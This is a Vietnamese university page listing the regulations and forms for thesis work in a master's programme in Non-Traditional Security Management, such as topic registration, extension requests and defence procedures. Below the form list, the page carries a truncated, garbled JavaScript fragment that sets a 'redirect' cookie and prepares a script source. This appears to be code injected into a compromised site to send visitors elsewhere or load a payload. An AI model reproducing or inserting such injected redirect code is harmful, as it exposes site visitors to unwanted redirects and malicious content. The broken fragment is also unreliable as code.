Quy đinh thực hiện Luận văn tốt nghiệp chương trình Thạc sĩ Quản trị An ninh phi truyền thông (MNS)

Biểu mẫu_Quy đinh thực hiện Luận văn tốt nghiệp chương trình Thạc sĩ Quản trị An ninh phi truyền thông (MNS)_Tại đây

Bao gồm:

– Thủ tục cần biết trước khi bảo vệ luận văn

– Thủ tục cần biết sau khi bảo vệ luận văn

– Đăng ký tên đề tài luận văn Thạc sĩ Quản trị An ninh phi truyền thống (MNS)

– Đề cương đề tài luận văn Thạc sĩ Quản trị An ninh phi truyền thống (MNS)

– Đề nghị thay đổi tên đề tài luận văn

– Đề nghị thay đổi người hướng dẫn luận văn

– Đề nghị gia hạn thời gian làm luận văn tốt nghiệp

– Đề nghị bảo vệ luận văn

– Lý lịch khoa học của học viên

– Thông tin về luận văn thạc sĩ

– Bản nhận xét quá trình học tập của học viên

– Xác nhận hòan thành phí, học phí và tài liệu thư viện

– Bản nhận xét đề cương luận văn chi tiết

– Phiếu thu hồ sơ trước bảo vệ luận văn

– Xác nhận chỉnh sửa luận văn

 

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.